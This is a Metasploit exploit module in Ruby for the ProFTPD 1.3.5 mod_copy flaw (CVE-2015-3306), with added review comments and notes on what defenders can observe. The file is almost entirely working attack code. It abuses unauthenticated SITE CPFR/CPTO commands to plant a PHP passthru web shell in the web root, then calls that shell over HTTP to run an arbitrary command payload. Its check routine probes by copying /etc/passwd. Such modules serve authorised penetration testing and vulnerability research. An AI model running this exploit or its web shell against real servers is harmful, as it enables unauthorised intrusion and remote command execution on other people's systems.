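##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# ProFTPD 1.3.5 mod_copy (CVE-2015-3306) exploit module.
#
# As implemented below, the unauthenticated FTP SITE CPFR/CPTO commands are
# used to copy /proc/self/cmdline to a file under TMPPATH and then to copy that
# file to SITEPATH/<random>.php, which is finally requested over HTTP.
#
# Observables a defender can rely on (matching 'Notes' below): two files are
# written on the target (one under TMPPATH, one under SITEPATH), and the
# SITE CPFR/CPTO sequence plus the HTTP request for the dropped .php file show
# up in the FTP and web server logs.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'ProFTPD 1.3.5 Mod_Copy Command Execution',
        'Description' => %q{
          This module exploits the SITE CPFR/CPTO mod_copy commands in ProFTPD version 1.3.5.
          Any unauthenticated client can leverage these commands to copy files from any
          part of the filesystem to a chosen destination. The copy commands are executed with
          the rights of the ProFTPD service, which by default runs under the privileges of the
          'nobody' user. By using /proc/self/cmdline to copy a PHP payload to the website
          directory, PHP remote code execution is made possible.
        },
        'Author' => [
          'Vadim Melihow', # Original discovery, Proof of Concept
          'xistence <xistence[at]0x90.nl>' # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2015-3306' ],
          [ 'EDB', '36742' ],
          [ 'URL', 'http://bugs.proftpd.org/show_bug.cgi?id=4169' ]
        ],
        'Privileged' => false,
        'Platform' => [ 'unix' ],
        'Arch' => ARCH_CMD,
        'Payload' => {
          'BadChars' => '',
          'Compat' => {
            'PayloadType' => 'cmd',
            'RequiredCmd' => 'generic gawk python perl netcat'
          }
        },
        'Targets' => [
          [ 'ProFTPD 1.3.5', {} ]
        ],
        'DisclosureDate' => '2015-04-22',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
        }
      )
    )

    # RPORT is the HTTP port used by HttpClient; the FTP side has its own option.
    register_options([
      OptPort.new('RPORT', [true, 'HTTP port', 80]),
      OptPort.new('RPORT_FTP', [true, 'FTP port', 21]),
      OptString.new('TARGETURI', [true, 'Base path to the website', '/']),
      OptString.new('TMPPATH', [true, 'Absolute writable path', '/tmp']),
      OptString.new('SITEPATH', [true, 'Absolute writable website path', '/var/www'])
    ])
  end

  # FTP port for the SITE CPFR/CPTO commands (RPORT itself is the HTTP port).
  def ftp_port
    datastore['RPORT_FTP']
  end

  # Probes the FTP service with a single unauthenticated SITE CPFR; no CPTO is
  # sent, so the probe selects a source path but performs no copy.
  #
  # @return [CheckCode] Appears on a 350 reply, Safe when the command is not
  #   understood or needs authentication, Unknown when no reply is obtained.
  def check
    sock = Rex::Socket.create_tcp('PeerHost' => rhost, 'PeerPort' => ftp_port)

    if sock.nil?
      return CheckCode::Unknown("#{rhost}:#{ftp_port} - Failed to connect to FTP server")
    end

    vprint_status("#{rhost}:#{ftp_port} - Connected to FTP server")

    # Set 30 second timeout to allow remote server time to perform reverse DNS lookup
    res = sock.get_once(-1, 30)

    # NOTE(review): a missing or non-220 banner is reported as Safe rather than
    # Unknown, so slow hosts may be under-reported — confirm this is intended.
    unless res && res.include?('220')
      return CheckCode::Safe("#{rhost}:#{ftp_port} - Failure retrieving ProFTPD 220 OK banner")
    end

    # NOTE(review): the other FTP commands in this module use put; puts may add a
    # second newline after "\r\n" — verify against Rex::IO::Stream#puts.
    sock.puts("SITE CPFR /etc/passwd\r\n")
    res = sock.get_once(-1, 10)

    # The connection is already up at this point; a nil here is a reply timeout.
    if res.nil?
      return CheckCode::Unknown("#{rhost}:#{ftp_port} - No response to SITE CPFR command")
    end

    if res.include?("500 'SITE CPFR' not understood")
      return CheckCode::Safe("#{rhost}:#{ftp_port} - SITE CPFR command not supported")
    end

    if res.include?('530')
      return CheckCode::Safe("#{rhost}:#{ftp_port} - SITE CPFR command requires authentication.")
    end

    if res.include?('350')
      return CheckCode::Appears("#{rhost}:#{ftp_port} - Unauthenticated SITE CPFR command was successful")
    end

    CheckCode::Safe
  ensure
    sock&.close
  end

  # Runs the FTP copy stage, registers the dropped .php for cleanup, then
  # requests it over HTTP with the command payload in a GET parameter.
  #
  # Only the SITEPATH file is registered with FileDropper; the TMPPATH file
  # written by the first copy remains on disk as an artifact.
  def exploit
    get_arg = rand_text_alphanumeric(5..7)
    payload_name = rand_text_alphanumeric(5..7) + '.php'

    copy_php_stager(get_arg, payload_name)

    register_file_for_cleanup("#{datastore['SITEPATH']}/#{payload_name}")

    uri = normalize_uri(target_uri.path, payload_name)
    print_status("Executing PHP payload #{uri}")
    res = send_request_cgi!(
      'uri' => uri,
      'vars_get' => { get_arg => "nohup #{payload.encoded} &" }
    )

    unless res && res.code == 200
      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure executing payload")
    end
  end

  private

  # FTP stage: connects to RPORT_FTP, waits for the 220 banner, copies
  # /proc/self/cmdline to a file under TMPPATH whose name embeds the PHP
  # snippet, then copies that file to SITEPATH/payload_name.
  #
  # Each step calls fail_with on an unexpected reply; the socket is closed
  # whether the stage completes or fail_with raises.
  #
  # @param get_arg [String] name of the GET parameter the PHP snippet reads
  # @param payload_name [String] file name of the .php dropped under SITEPATH
  def copy_php_stager(get_arg, payload_name)
    sock = Rex::Socket.create_tcp('PeerHost' => rhost, 'PeerPort' => ftp_port)

    if sock.nil?
      fail_with(Failure::Unreachable, "#{rhost}:#{ftp_port} - Failed to connect to FTP server")
    end

    print_status("#{rhost}:#{ftp_port} - Connected to FTP server")

    # Set 30 second timeout to allow remote server time to perform reverse DNS lookup
    res = sock.get_once(-1, 30)
    unless res && res.include?('220')
      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure retrieving ProFTPD 220 OK banner")
    end

    print_status("#{rhost}:#{ftp_port} - Sending copy commands to FTP server")

    # Destination of the first copy and source of the second; the same path
    # string must be used for both SITE commands.
    tmp_file = "#{datastore['TMPPATH']}/.<?php passthru($_GET['#{get_arg}']);?>"

    # NOTE(review): puts is used here but put for the remaining commands; verify
    # whether Rex::IO::Stream#puts appends another newline after "\r\n".
    sock.puts("SITE CPFR /proc/self/cmdline\r\n")
    res = sock.get_once(-1, 10)
    unless res && res.include?('350')
      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying from /proc/self/cmdline")
    end

    sock.put("SITE CPTO #{tmp_file}\r\n")
    res = sock.get_once(-1, 10)
    unless res && res.include?('250')
      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying to temporary payload file")
    end

    sock.put("SITE CPFR #{tmp_file}\r\n")
    res = sock.get_once(-1, 10)
    unless res && res.include?('350')
      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying from temporary payload file")
    end

    sock.put("SITE CPTO #{datastore['SITEPATH']}/#{payload_name}\r\n")
    res = sock.get_once(-1, 10)
    unless res && res.include?('250')
      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying PHP payload to website path, directory not writable?")
    end
  ensure
    # Closes on every path, including the fail_with raises above.
    sock&.close
  end
end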